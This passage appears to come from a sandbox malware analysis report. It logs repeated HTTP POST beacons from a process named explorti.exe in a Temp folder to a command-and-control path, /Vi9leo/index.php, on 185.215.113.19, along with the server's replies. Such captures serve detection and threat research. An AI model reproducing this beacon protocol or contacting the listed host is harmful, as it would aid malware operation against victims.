36	192.168.2.6	56758	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:47.098397970 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:47.906388044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:47.918606043 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:48.173125982 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	56760	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:48.294779062 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:49.061882973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:49.062551975 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:49.316051960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	56761	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:49.436431885 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:50.206028938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:50.207025051 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:50.512990952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	56762	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:50.623004913 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:51.381611109 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:51.382411003 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:51.634221077 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	56763	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:51.748092890 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:52.578602076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:52.579920053 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:52.829962969 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	56764	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:52.951522112 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:53.721858978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:53.724915981 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:53.977696896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	56765	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:54.093653917 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:54.866554022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:54.868592024 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:55.118202925 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	56766	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:55.232702017 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:56.008327961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:56.009145975 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:56.541368961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 21:04:56.543277025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	56767	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:56.655301094 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:57.412147999 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:57.413019896 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:57.705214024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	56768	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:57.826909065 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:58.596900940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:58.600279093 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:58.851795912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	56769	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:58.967022896 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:59.743467093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:59.744066954 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:59.990195036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	56770	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:05:00.356144905 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:05:01.035115957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:05:01.040838003 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:05:01.294691086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	56771	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:05:01.405976057 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:05:02.575886011 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
